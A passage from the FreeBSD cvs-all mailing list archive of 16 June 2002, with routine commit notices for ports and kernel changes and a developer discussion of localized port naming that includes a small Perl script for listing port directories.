patch-src::hmake::Makefile patch-src::hp2graph::Makefile patch-src::prelude::Makefile ... X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/16 12:13:20 PDT Modified files: lang/nhc98 Makefile distinfo pkg-plist lang/nhc98/files patch-Makefile Removed files: lang/nhc98/files patch-include::localmalloc.h patch-script::confhat patch-src::greencard::Makefile patch-src::hat::lib::Makefile patch-src::hmake::Makefile patch-src::hp2graph::Makefile patch-src::prelude::Makefile patch-src::runtime::Makefile lang/nhc98/scripts pre-install Log: upgrade to 1.14 PR: 39368 Submitted by: maintainer Revision Changes Path 1.9 +5 -45 ports/lang/nhc98/Makefile 1.5 +1 -4 ports/lang/nhc98/distinfo 1.3 +6 -6 ports/lang/nhc98/files/patch-Makefile 1.2 +0 -9 ports/lang/nhc98/files/patch-include::localmalloc.h (dead) 1.2 +0 -9 ports/lang/nhc98/files/patch-script::confhat (dead) 1.3 +0 -11 ports/lang/nhc98/files/patch-src::greencard::Makefile (dead) 1.2 +0 -11 ports/lang/nhc98/files/patch-src::hat::lib::Makefile (dead) 1.3 +0 -11 ports/lang/nhc98/files/patch-src::hmake::Makefile (dead) 1.3 +0 -11 ports/lang/nhc98/files/patch-src::hp2graph::Makefile (dead) 1.3 +0 -23 ports/lang/nhc98/files/patch-src::prelude::Makefile (dead) 1.3 +0 -20 ports/lang/nhc98/files/patch-src::runtime::Makefile (dead) 1.4 +95 -144 ports/lang/nhc98/pkg-plist 1.2 +0 -25 ports/lang/nhc98/scripts/pre-install (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 12:47: 5 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9CE4037B41F; Sun, 16 Jun 2002 12:47:02 -0700 (PDT) Received: (from dwcjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GJl2f34517; Sun, 16 Jun 2002 12:47:02 -0700 (PDT) (envelope-from dwcjr) Message-Id: <200206161947.g5GJl2f34517@freefall.freebsd.org> From: "David W. Chapman Jr." Date: Sun, 16 Jun 2002 12:47:02 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/crystal Makefile distinfo ports/devel/crystal/files patch-aa X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dwcjr 2002/06/16 12:47:02 PDT Modified files: devel/crystal Makefile distinfo Added files: devel/crystal/files patch-aa Log: Update to latest to unbreak Submitted by: maintainer Revision Changes Path 1.5 +3 -6 ports/devel/crystal/Makefile 1.2 +1 -1 ports/devel/crystal/distinfo 1.1 +12 -0 ports/devel/crystal/files/patch-aa (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 12:49:44 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 147AA37B41C; Sun, 16 Jun 2002 12:49:42 -0700 (PDT) Received: (from dougb@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GJnf534676; Sun, 16 Jun 2002 12:49:41 -0700 (PDT) (envelope-from dougb) Message-Id: <200206161949.g5GJnf534676@freefall.freebsd.org> From: Doug Barton Date: Sun, 16 Jun 2002 12:49:41 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dougb 2002/06/16 12:49:41 PDT Modified files: . modules Log: Add textproc/p5-PodParser Revision Changes Path 1.5367 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 13: 2:13 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 07FD937B415; Sun, 16 Jun 2002 13:02:10 -0700 (PDT) Received: (from dillon@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GK29C36148; Sun, 16 Jun 2002 13:02:10 -0700 (PDT) (envelope-from dillon) Message-Id: <200206162002.g5GK29C36148@freefall.freebsd.org> From: Matt Dillon Date: Sun, 16 Jun 2002 13:02:09 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/libexec/rtld-elf/i386 reloc.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dillon 2002/06/16 13:02:09 PDT Modified files: (Branch: RELENG_4) libexec/rtld-elf/i386 reloc.c Log: MFC 1.10 - replace alloca() with mmap() to avoid unbounded stack usage. This solves problem when installing openoffice from ports and may also solve some of the instability issues with large GUI programs like Mozilla, Konq, etc (thread stacks were being overrun). Approved by: jdp Revision Changes Path 1.6.2.2 +20 -8 src/libexec/rtld-elf/i386/reloc.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 13: 9:11 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E786A37B40F; Sun, 16 Jun 2002 13:09:07 -0700 (PDT) Received: (from dinoex@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GK97b40606; Sun, 16 Jun 2002 13:09:07 -0700 (PDT) (envelope-from dinoex) Message-Id: <200206162009.g5GK97b40606@freefall.freebsd.org> From: Dirk Meyer Date: Sun, 16 Jun 2002 13:09:07 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/mail/kiltdown Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dinoex 2002/06/16 13:09:07 PDT Modified files: mail/kiltdown Makefile Log: Change PERL5 to SED Revision Changes Path 1.8 +4 -4 ports/mail/kiltdown/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 13:27:59 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 45EC037B420; Sun, 16 Jun 2002 13:27:51 -0700 (PDT) Received: (from will@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GKRpT42646; Sun, 16 Jun 2002 13:27:51 -0700 (PDT) (envelope-from will) Message-Id: <200206162027.g5GKRpT42646@freefall.freebsd.org> From: Will Andrews Date: Sun, 16 Jun 2002 13:27:51 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/Mk bsd.kde.mk X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG will 2002/06/16 13:27:51 PDT Modified files: Mk bsd.kde.mk Log: Get rid of old cruft that was inserted a long time ago to workaround problems people were seeing with e.g. devel/pth and friends installed. They conflict with GCC3 and may not be an issue anymore. But if someone reports the issue again we'll address it with a finer comb next time. Revision Changes Path 1.14 +4 -4 ports/Mk/bsd.kde.mk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 13:35:59 2002 Delivered-To: cvs-all@freebsd.org Received: from mail.imp.ch (mail.imp.ch [157.161.1.2]) by hub.freebsd.org (Postfix) with ESMTP id 6BE9837B404; Sun, 16 Jun 2002 13:35:27 -0700 (PDT) Received: from nbs.imp.ch (nbs.imp.ch [157.161.4.7]) by mail.imp.ch (8.11.6/8.11.6) with ESMTP id g5GKZQb84396; Sun, 16 Jun 2002 22:35:26 +0200 (CEST) Received: from levais.imp.ch (levais.imp.ch [157.161.4.66]) by nbs.imp.ch (8.12.3/8.12.3) with ESMTP id g5GKZP908206702; Sun, 16 Jun 2002 22:35:26 +0200 (MES) Date: Sun, 16 Jun 2002 22:36:28 +0200 (CEST) From: Martin Blapp To: Kris Kennaway , , Cc: , Subject: Re: cvs commit: ports/editors Makefile ports/editors/openoffice-dk Makefile In-Reply-To: <20020615163411.L34000-100000@levais.imp.ch> Message-ID: <20020616212558.V34000-100000@levais.imp.ch> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi all, > > all of the other localized ports like *-ispell, etc. Could you please > > remove and re-add them? > > I'm not sure anymore if I really should do this. > > There are both variants. And I don't know why exactly I should back out my > commits and things like kde3-i18n can stay. What is now the status here ? Should I modify and fix _ALL_ ports which are in the repo, including the following list ? While searching, I noted that there are ports which have a name like port-xx and are resistered as xx-port in the INDEX and in the CVS-ROOT/modules. And of course, there is an opposite. And I noted that there are about 20 ports which have to be moved to the appropriate language directory. As you see, there are many many ports which have the postfix, and only a few dirs with the prefix. In the INDEX and module files there are only a few ports with the postfix, but many with the prefix. Of course all or most ports from /ports/german, ports/japanese etc are missing here. CASE 1: port-xx /usr/ports/misc/kde3-i18n-af /usr/ports/editors/openoffice-ar /usr/ports/misc/kde3-i18n-ar /usr/ports/www/frontpage-ar /usr/ports/misc/kde3-i18n-az /usr/ports/graphics/eterm-bg (this is just an ending for background) /usr/ports/misc/kde3-i18n-bg /usr/ports/misc/kde3-i18n-bs /usr/ports/misc/kde3-i18n-ca /usr/ports/games/hlserver-cs (counterstrike :-) /usr/ports/misc/kde3-i18n-cs /usr/ports/misc/kde3-i18n-da /usr/ports/www/frontpage-de (this one belongs to ports/german) /usr/ports/misc/kde3-i18n-el /usr/ports/misc/kde3-i18n-en_GB /usr/ports/misc/kde3-i18n-eo /usr/ports/editors/openoffice-es /usr/ports/misc/kde3-i18n-es /usr/ports/www/frontpage-es /usr/ports/misc/kde3-i18n-et /usr/ports/games/hlserver-fa /usr/ports/misc/kde3-i18n-fi /usr/ports/www/frontpage-fr (this one belongs to ports/french) /usr/ports/misc/kde3-i18n-he (this one belongs to ports/hebrew) /usr/ports/www/frontpage-he (this one belongs to ports/hebrew) /usr/ports/misc/kde3-i18n-hr /usr/ports/misc/kde3-i18n-hu /usr/ports/misc/kde3-i18n-id /usr/ports/misc/kde3-i18n-is /usr/ports/editors/openoffice-it /usr/ports/misc/kde3-i18n-it /usr/ports/www/frontpage-it /usr/ports/www/frontpage-ja (this one belongs to ports/japanese) /usr/ports/www/frontpage-ko (this one belongs to ports/korean) /usr/ports/misc/kde3-i18n-lt /usr/ports/misc/kde3-i18n-lv /usr/ports/misc/kde3-i18n-mt /usr/ports/editors/openoffice-nl /usr/ports/misc/kde3-i18n-nl /usr/ports/www/frontpage-nl /usr/ports/misc/kde3-i18n-nb /usr/ports/misc/kde3-i18n-nn /usr/ports/editors/openoffice-pl /usr/ports/lang/swi-pl (some perl port) /usr/ports/misc/kde3-i18n-pl /usr/ports/editors/staroffice52-pt /usr/ports/editors/openoffice-pt /usr/ports/misc/kde3-i18n-pt /usr/ports/misc/kde3-i18n-pt_BR /usr/ports/www/frontpage-pt_BR /usr/ports/devel/py-ro /usr/ports/misc/kde3-i18n-ro /usr/ports/misc/kde3-i18n-sk /usr/ports/misc/kde3-i18n-sl /usr/ports/misc/kde3-i18n-sr /usr/ports/misc/kde3-i18n-sv /usr/ports/www/frontpage-sv /usr/ports/misc/kde3-i18n-ta /usr/ports/misc/kde3-i18n-th /usr/ports/www/frontpage-th /usr/ports/editors/openoffice-tr /usr/ports/misc/kde3-i18n-tr /usr/ports/ukrainian/kde-i18n-uk /usr/ports/misc/kde3-i18n-ven /usr/ports/misc/kde3-i18n-vi (this one belongs to ports/vietnamese) /usr/ports/misc/kde3-i18n-xh /usr/ports/chinese/kde3-i18n-zh_CN (this one belongs to ports/chinese) /usr/ports/chinese/kde3-i18n-zh_TW (this one belongs to ports/chinese) /usr/ports/misc/kde3-i18n-zu CASE 2: xx-port /usr/ports/textproc/br-ispell /usr/ports/security/ca-roots (Certificate utility) /usr/ports/textproc/british-ispell (this should be en_GB-ispell even) /usr/ports/devel/id-utils (identifier database tool) /usr/ports/textproc/nl-ispell /usr/ports/misc/pl-sms (sms send tool) /usr/ports/irc/tr-ircd /usr/ports/misc/uk-phone /usr/ports/misc/uk-postcodes And here is the script I used to search: #!/usr/bin/perl @langs = ("af", "ar", "az", "be", "bg", "bn", "bo", "br", "bs", "ca", "cs", "cy", "da", "de", "el", "en", "en_GB", "british", "eo", "es", "et", "eu", "fa", "fi", "fr", "ga", "gl", "he", "hi", "hr", "hu", "id", "is", "it", "ja", "km", "ko", "ku", "lo", "lt", "lv", "mi", "mk", "mr", "mt", "nl", "nb", "nn", "oc", "pl", "pt", "pt_BR", "ro", "ru", "sk", "sl", "sq", "sr", "sv", "ta", "tg", "th", "tr", "uk", "ven", "vi", "wa", "xh", "zh_CN", "zh_TW", "zu"); if (-e "/usr/ports") { } else { system("find /usr/ports > /usr/ports/list"); } print "CASE 1: port-xx\n\n"; foreach $lang (@langs) { open(LIST,"/usr/ports/list"); while () { if (/-$lang$/) { print $_; } } close(LIST); } print "\n\nCASE 2: xx-port\n\n"; foreach $lang (@langs) { open(LIST,"/usr/ports/list"); while () { if (/\/$lang-/) { print $_; } } close(LIST); } Martin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 13:42:44 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 451B437B426; Sun, 16 Jun 2002 13:42:30 -0700 (PDT) Received: (from alc@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GKgUK44751; Sun, 16 Jun 2002 13:42:30 -0700 (PDT) (envelope-from alc) Message-Id: <200206162042.g5GKgUK44751@freefall.freebsd.org> From: Alan Cox Date: Sun, 16 Jun 2002 13:42:30 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/vm vm_fault.c vm_mmap.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG alc 2002/06/16 13:42:29 PDT Modified files: sys/vm vm_fault.c vm_mmap.c Log: o Remove GIANT_REQUIRED from vm_fault_user_wire(). o Move pmap_pageable() outside of Giant in vm_fault_unwire(). (pmap_pageable() is a no-op on all supported architectures.) o Remove the acquisition and release of Giant from mlock(). Revision Changes Path 1.143 +1 -5 src/sys/vm/vm_fault.c 1.146 +0 -2 src/sys/vm/vm_mmap.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 13:53:39 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3F1D937B40D; Sun, 16 Jun 2002 13:53:36 -0700 (PDT) Received: (from n_hibma@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GKra245826; Sun, 16 Jun 2002 13:53:36 -0700 (PDT) (envelope-from n_hibma) Message-Id: <200206162053.g5GKra245826@freefall.freebsd.org> From: Nick Hibma Date: Sun, 16 Jun 2002 13:53:36 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/dev/usb umass.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG n_hibma 2002/06/16 13:53:36 PDT Modified files: sys/dev/usb umass.c Log: Rewrite the probe routine. This makes adding drives and quirks more easy. While there change a few names to less confusing ones. Revision Changes Path 1.61 +250 -266 src/sys/dev/usb/umass.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 13:59:25 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A754F37B41B; Sun, 16 Jun 2002 13:59:16 -0700 (PDT) Received: (from dougb@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GKxGJ46183; Sun, 16 Jun 2002 13:59:16 -0700 (PDT) (envelope-from dougb) Message-Id: <200206162059.g5GKxGJ46183@freefall.freebsd.org> From: Doug Barton Date: Sun, 16 Jun 2002 13:59:16 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/etc rc.syscons X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dougb 2002/06/16 13:59:16 PDT Modified files: etc rc.syscons Log: Try handling lack of syscons (for diskless boot, or other) by testing for the presence of /dev/ttyv0. PR: misc/39351 Submitted by: Dirk-Willem van Gulik Revision Changes Path 1.6 +7 -1 src/etc/rc.syscons To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 14: 2:15 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 704BC37B406; Sun, 16 Jun 2002 14:02:08 -0700 (PDT) Received: (from wollman@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GL28U46861; Sun, 16 Jun 2002 14:02:08 -0700 (PDT) (envelope-from wollman) Message-Id: <200206162102.g5GL28U46861@freefall.freebsd.org> From: Garrett Wollman Date: Sun, 16 Jun 2002 14:02:08 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/sys statvfs.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG wollman 2002/06/16 14:02:08 PDT Modified files: sys/sys statvfs.h Log: Fix two syntax errors and add declarations of statvfs() and fstatvfs(). Revision Changes Path 1.2 +6 -2 src/sys/sys/statvfs.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 14: 4:19 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BB93337B41A; Sun, 16 Jun 2002 14:04:15 -0700 (PDT) Received: (from nectar@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GL4Fn46951; Sun, 16 Jun 2002 14:04:15 -0700 (PDT) (envelope-from nectar) Message-Id: <200206162104.g5GL4Fn46951@freefall.freebsd.org> From: Jacques Vidrine Date: Sun, 16 Jun 2002 14:04:15 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/su Makefile su.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG nectar 2002/06/16 14:04:15 PDT Modified files: (Branch: RELENG_4) usr.bin/su Makefile su.c Log: Add Kerberos 5 support to su. Reviewed by: freebsd-audit, security-officer Revision Changes Path 1.29.2.1 +11 -2 src/usr.bin/su/Makefile 1.34.2.4 +255 -45 src/usr.bin/su/su.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 14:38:59 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 289D937B40D; Sun, 16 Jun 2002 14:38:56 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GLcuw54427; Sun, 16 Jun 2002 14:38:56 -0700 (PDT) (envelope-from pat) Message-Id: <200206162138.g5GLcuw54427@freefall.freebsd.org> From: Patrick Li Date: Sun, 16 Jun 2002 14:38:56 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/opendchub Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/16 14:38:56 PDT Modified files: net/opendchub Makefile distinfo Log: Update to 0.6.6 PR: 39374 Submitted by: maintainer Revision Changes Path 1.2 +1 -1 ports/net/opendchub/Makefile 1.2 +1 -1 ports/net/opendchub/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 14:50:46 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9545237B412; Sun, 16 Jun 2002 14:50:43 -0700 (PDT) Received: (from des@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GLohe55971; Sun, 16 Jun 2002 14:50:43 -0700 (PDT) (envelope-from des) Message-Id: <200206162150.g5GLohe55971@freefall.freebsd.org> From: Dag-Erling Smorgrav Date: Sun, 16 Jun 2002 14:50:43 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/dev/drm drm_os_freebsd.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG des 2002/06/16 14:50:43 PDT Modified files: sys/dev/drm drm_os_freebsd.h Log: Remove to unbreak the build. I'm not sure if this affects the functionality of the drm module, but hopefully it will tide us over until Eric can take a look at it. Revision Changes Path 1.6 +0 -1 src/sys/dev/drm/drm_os_freebsd.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 14:52:50 2002 Delivered-To: cvs-all@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 4C8F837B405; Sun, 16 Jun 2002 14:52:47 -0700 (PDT) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 5E3285361; Sun, 16 Jun 2002 23:52:44 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: cvs-committers@FreeBSD.org Cc: cvs-all@FreeBSD.org Subject: Re: cvs commit: src/sys/dev/drm drm_os_freebsd.h References: <200206162150.g5GLohe55971@freefall.freebsd.org> From: Dag-Erling Smorgrav Date: 16 Jun 2002 23:52:44 +0200 In-Reply-To: <200206162150.g5GLohe55971@freefall.freebsd.org> Message-ID: Lines: 11 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Dag-Erling Smorgrav writes: > Log: > Remove to unbreak the build. I'm not sure if this affects > the functionality of the drm module, but hopefully it will tide us over > until Eric can take a look at it. To forestall any questions on procedure: I am Eric's mentor. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 15: 2:52 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8C6B037B428; Sun, 16 Jun 2002 15:02:32 -0700 (PDT) Received: (from nik@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GM2WN57007; Sun, 16 Jun 2002 15:02:32 -0700 (PDT) (envelope-from nik) Message-Id: <200206162202.g5GM2WN57007@freefall.freebsd.org> From: Nik Clayton Date: Sun, 16 Jun 2002 15:02:32 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT access X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG nik 2002/06/16 15:02:32 PDT Modified files: . access Log: It is my great pleasure to welcome Marc Fonvieille (blackend) to the funny farm, for services above and beyond the call of duty to the -doc PR list. Marc will be mentored by Giorgos as he joins our happy family. Revision Changes Path 1.320 +1 -0 CVSROOT/access To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 15:18:15 2002 Delivered-To: cvs-all@freebsd.org Received: from dragon.nuxi.com (trang.nuxi.com [66.92.13.169]) by hub.freebsd.org (Postfix) with ESMTP id 3861637B413; Sun, 16 Jun 2002 15:18:10 -0700 (PDT) Received: from dragon.nuxi.com (obrien@localhost [127.0.0.1]) by dragon.nuxi.com (8.12.3/8.12.2) with ESMTP id g5GMI9P8015170; Sun, 16 Jun 2002 15:18:10 -0700 (PDT) (envelope-from obrien@dragon.nuxi.com) Received: (from obrien@localhost) by dragon.nuxi.com (8.12.3/8.12.3/Submit) id g5GMI9eQ015169; Sun, 16 Jun 2002 15:18:09 -0700 (PDT) Date: Sun, 16 Jun 2002 15:18:09 -0700 From: "David O'Brien" To: grog@FreeBSD.ORG, cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG Subject: Re: cvs commit: src/usr.bin/calendar Makefile Message-ID: <20020616151809.B14942@dragon.nuxi.com> Reply-To: obrien@FreeBSD.ORG Mail-Followup-To: David O'Brien , grog@FreeBSD.ORG, cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG References: <20020615231946.GA65995@wantadilla.lemis.com> <20020616.012729.70214483.imp@village.org> <20020616003205.A40830@FreeBSD.ORG> <20020616.013617.101655762.imp@village.org> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5i In-Reply-To: <20020616.013617.101655762.imp@village.org>; from imp@village.org on Sun, Jun 16, 2002 at 01:36:17AM -0600 X-Operating-System: FreeBSD 5.0-CURRENT Organization: The NUXI BSD group X-Pgp-Rsa-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A X-Pgp-Rsa-Keyid: 1024/34F9F9D5 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sun, Jun 16, 2002 at 01:36:17AM -0600, M. Warner Losh wrote: > In message: <20020616003205.A40830@FreeBSD.ORG> > Juli Mallett writes: > : * "M. Warner Losh" escriurères > : > > : > In short, make install is only supported after the mtree of > : > installworld has happend :-) > : > > : > : Do we have a target to just redo the mtree stuff? If so, it'd prolly be > : easier to point users to using that, in addition. > > cd src/etc > make distrib-dirs Can also be spelled: cd /usr/src make hierarchy To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 15:59:25 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C0EF437B40B; Sun, 16 Jun 2002 15:59:21 -0700 (PDT) Received: (from grog@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GMxLv65907; Sun, 16 Jun 2002 15:59:21 -0700 (PDT) (envelope-from grog) Message-Id: <200206162259.g5GMxLv65907@freefall.freebsd.org> From: Greg Lehey 